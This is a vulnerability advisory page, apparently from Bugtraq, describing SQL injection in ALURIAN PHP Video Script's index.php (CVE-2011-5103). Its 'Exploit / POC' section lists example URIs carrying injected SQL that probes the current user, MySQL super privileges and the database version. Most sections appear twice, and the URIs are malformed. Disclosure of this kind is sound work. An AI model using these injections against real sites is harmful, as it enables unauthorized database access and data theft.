PHP Video Script 'index.php' SQL Injection Vulnerability
BID:50815
Info
PHP Video Script 'index.php' SQL Injection Vulnerability
| Bugtraq ID: | 50815 |
| Class: | Input Validation Error |
| CVE: |
CVE-2011-5103 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 25 2011 12:00AM |
| Updated: | Mar 19 2015 07:35AM |
| Credit: | longrifle0x |
| Vulnerable: |
ALURIAN PHP Video Script 0 |
| Not Vulnerable: | |
Discussion
PHP Video Script 'index.php' SQL Injection Vulnerability
PHP Video Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHP Video Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
PHP Video Script 'index.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com:80/tag'/index.php?id=1<http://localhost/tag'/index.php?id=1> [GET][id=-1][CURRENT_USER()
http://www.example.com:80/tag'/index.php?id=1[GET][id=-1][SELECT(CASE<http://localhost/tag'/index.php?id=1[GET][id=-1][SELECT(CASE> WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)
http://www.example.com:80/tag'/index.php?id=1[GET][id=-1][MID((VERSION()),1,6)<http://localhost/tag'/index.php?id=1[GET][id=-1][MID((VERSION()),1,6)>
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com:80/tag'/index.php?id=1<http://localhost/tag'/index.php?id=1> [GET][id=-1][CURRENT_USER()
http://www.example.com:80/tag'/index.php?id=1[GET][id=-1][SELECT(CASE<http://localhost/tag'/index.php?id=1[GET][id=-1][SELECT(CASE> WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)
http://www.example.com:80/tag'/index.php?id=1[GET][id=-1][MID((VERSION()),1,6)<http://localhost/tag'/index.php?id=1[GET][id=-1][MID((VERSION()),1,6)>
Solution / Fix
PHP Video Script 'index.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
PHP Video Script 'index.php' SQL Injection Vulnerability
References:
References:
- PHP Video Script Homepage (ALURIAN)